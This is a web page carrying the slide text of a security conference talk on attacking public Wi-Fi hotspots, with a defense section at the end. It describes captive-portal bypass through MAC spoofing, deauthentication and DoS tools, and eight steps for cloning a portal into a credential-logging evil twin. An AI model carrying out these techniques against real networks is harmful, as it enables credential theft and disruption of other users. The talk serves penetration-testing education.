PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018
Greg Foss
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17
Greg Foss
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
Greg Foss
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
Greg Foss
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
Greg Foss
 

More from Greg Foss (9)

Cloud Crime Ops
Cloud Crime OpsCloud Crime Ops
Cloud Crime Ops
 
Future of Destructive Malware
Future of Destructive MalwareFuture of Destructive Malware
Future of Destructive Malware
 
Crypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto FarmerCrypto Hacks - Quit your Job and Become a Crypto Farmer
Crypto Hacks - Quit your Job and Become a Crypto Farmer
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17
 
Security Automation and Orchestration
Security Automation and OrchestrationSecurity Automation and Orchestration
Security Automation and Orchestration
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
 

Recently uploaded

Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
Abida Shariff
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
Bhaskar Mitra
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 

Recently uploaded (20)

Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
Search and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical FuturesSearch and Society: Reimagining Information Access for Radical Futures
Search and Society: Reimagining Information Access for Radical Futures
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 

Wi-Fi Hotspot Attacks

  • 1. Wi-Fi Hacking for Web Pentesters Greg Foss Sr. Security Research Engineer @heinzarelli
  • 2. Greg Foss Sr. Security Research Engineer OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, CYBER APT # whoami
  • 3.
  • 4. *I am not liable for what you do with any of this information* Section 638:17 House Bill 495 - US rules against wireless hacking http://en.wikipedia.org/wiki/Legality_of_piggybacking#United_States
  • 5. DISCLAIMER Not a ‘Wi-Fi Security Expert’ nor a Lawyer Just about everything I’m going to demonstrate is probably illegal, don’t do any of this against unauthorized targets…
  • 6. Not Discussing Wi-Fi Security Basics • 802.11 • WEP Cracking - ridiculously easy, google it • WPA / WPA2 Attacks - Reaver • WPS Attacks - Reaver • PEAP, LEAP, etc. - Out of Scope
  • 8.
  • 9. it’s everywhere… enough free WiFi that it’s almost not worth the time it takes to infiltrate unless free internet’s not the goal…
  • 10. Bypassing is easy… • Sometimes Tor or a VPN will simply be allowed through the captive portal, no joke • Try appending ?.jpg or ?.png to the URL • Look for Open Redirect flaws, iFrames, etc. • Tunnel out over DNS! • Same tricks work if your ISP suspends your internet access, depending on the ISP of course…
  • 11. Bypassing is easy… • On time-limited access points, just change your MAC when the time runs out. Or sniff MACs and ride on another’s paid access. • De-auth existing clients and/or DoS access points: • Aireplay-ng or Airdrop • http://www.aircrack-ng.org/ • MDK3 • https://forums.kali.org/showthread.php?19498- MDK3-Secret-Destruction-Mode
  • 12. Bypassing is easy… • Sniff MAC Addresses and wait for a user to go idle, then modify your MAC and IP to match • Works on just about any open access point, especially captive portals • CPSCAM by Josh Wright will do this for you: • http://www.willhackforsushi.com/code/ cpscam.pl
  • 13. Hijacking is also easy…
  • 14.
  • 15.
  • 16. The Evil Twin… source: http://www.breakthesecurity.com/2014/04/evil-twin-attack-fake-wifi-hack.html
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25. How to clone and weaponize captive portals 1. Connect to the access point and wait for the splash page to pop- up. 2. Close the splash page, and open your browser. Visit any random web page (http normally works better than https). 3. When the splash page comes up, save the entire landing page. Use the splash page and save additional pages as necessary. 4. Change the UA string and grab the mobile version as well if it exists. 5. Replace the form processor to write a log file and pass the client through to a legitimate landing page. 6. Modify the page HTML to point to your form processor and modify parameters as necessary. 7. Deploy the captive portal (will discuss this shortly) 8. Use IPTables to allow the victim’s MAC through to the internet using the form processor.
  • 26.
  • 27.
  • 29. Mobile Cloning • HTTrack: http://www.httrack.com/
  • 30. Mobile Cloning • VT View Source:
 
 https://play.google.com/ store/apps/details? id=com.tozalakyan.view source&hl=en
  • 31.
  • 32. How to Deauthenticate Clients and DoS Access Points • Aireplay-ng using the —deauth flag • file2air - deauth packet injection flood tool by Josh Wright • http://www.willhackforsushi.com/code/file2air/1.1/ file2air-1.1.tgz • Spoof AP MAC, send deauth requests to clients • Target a single user, all users, or AP itself • MDK3 Deauth Amok Mode to take out all WPA AP’s
  • 33. How to Deauthenticate Clients and DoS Access Points source: https://github.com/sophron/wifiphisher
  • 34. How to Deauthenticate Clients and DoS Access Points https://github.com/sophron/wifiphisher
  • 37. Generic Splash Page Pineapple Configuration /etc/nodogsplash/htdocs/splash.html
  • 38. Landing Page Pineapple Configuration - JavaScript Necessities /www/[directory]/index.html
  • 39. PHP Form Processor Pineapple Configuration Easier than using IPTables /www/[directory]/auth/login.php
  • 40.
  • 41.
  • 42.
  • 43.
  • 44. A word of caution w/ the Pineapple…
  • 45. A word of caution w/ the Pineapple…
  • 46. Existing Router Ideally one supporting guest mode…
  • 47. DDWRT • Flash with DDWRT, then you can use NocatSplash to configure a captive portal. • Many other ways to go about this… DDWRT is just one of the easier options. • http://www.dd-wrt.com/site/index • http://sourceforge.net/projects/ nocatsplash/
  • 48.
  • 49.
  • 51. • Kali Linux • http://www.kali.org/ • Can do just about anything to connecting clients • Unlimited attack potential and plenty of drive space to build elaborate landing pages and believable scenarios Laptop Hotspot and/or Proxy
  • 52. • Makes hacking Wi-Fi even easier! • https://github.com/SilverFoxx/PwnSTAR PwnStar - By SilverFoxx
  • 53.
  • 54.
  • 55. Demo
  • 57. Combine Pineapple portability with the versatility of Kali Linux • http://www.offensive-security.com/kali- linux/kali-linux-evil-wireless-access-point/
  • 58. BeagleBone Black + Alfa Wi-Fi Card http://beagleboard.org/black http://www.alfa.com.tw/
  • 59. BeagleBone AP Deployment Options get creative…
  • 60.
  • 61. Going Mobile! • Nexus Device with Kali NetHunter • https://www.kali.org/kali-linux-nethunter/ • Pwnie Express Pwn Phone/Pad • https://www.pwnieexpress.com/product/ pwn-phone2014/
  • 64.
  • 65.
  • 66. MITM Basic Tools • AirSSL • AirJack • Airsnarf • Dsniff • Cain • void11 • Ferret • SSLStrip • Wireshark • AirPwn • Ettercap • Etc…
  • 67. You don’t even need to authenticate to attack clients
  • 68. Fun with MITM • Snapception - https://github.com/thebradbain/ snapception • Love Thy Neighbors - http:// neighbor.willhackforsushi.com/ • AirPWN - http://airpwn.sourceforge.net/ Airpwn.html • Intercepter-NG - http://intercepter.nerf.ru/ • Many, many more…
  • 69. Demo
  • 70. Client Defense… • Always use a VPN/VPS/SSH Port Forwarding/ etc. when connected to an open access point. • Turn all Wireless devices off when traveling or in crowded areas, many devices still connect to wireless networks even when ‘sleeping’. • Hotspot not served up over HTTPS and other generally suspicious behavior. • Beware duplicate networks with different encryption.
  • 71. Client Defense… • Use different login details and passwords for public wifi. Test false-credentials first, if it lets you through it’s not legit. • Turn off Wi-Fi on devices when traveling. • Exercise caution when connections suddenly drop, especially if it happens for everyone on the network. • If it just ‘doesn’t feel right’ then trust your instincts…
  • 72. Resources • http://www.willhackforsushi.com/code/cpscam.pl • http://neighbor.willhackforsushi.com/ • http://www.aircrack-ng.org/ • http://www.dd-wrt.com/ • https://github.com/SilverFoxx/PwnSTAR • http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ • http://beagleboard.org/black • http://www.armhf.com/boards/beaglebone-black/bbb-sd-install/ • http://grinninggecko.com/2013/09/13/kali-linux-on-headless-beaglebone-black-via- os-x/ • https://github.com/thebradbain/snapception • http://airpwn.sourceforge.net/Airpwn.html • http://intercepter.nerf.ru/
  • 73. Thank You! Questions? https://github.com/gfoss/misc/Wireless/Captive-Portals/ Greg Foss
 Senior Security Research Engineer
 greg.foss[at]LogRhythm.com
 @heinzarelli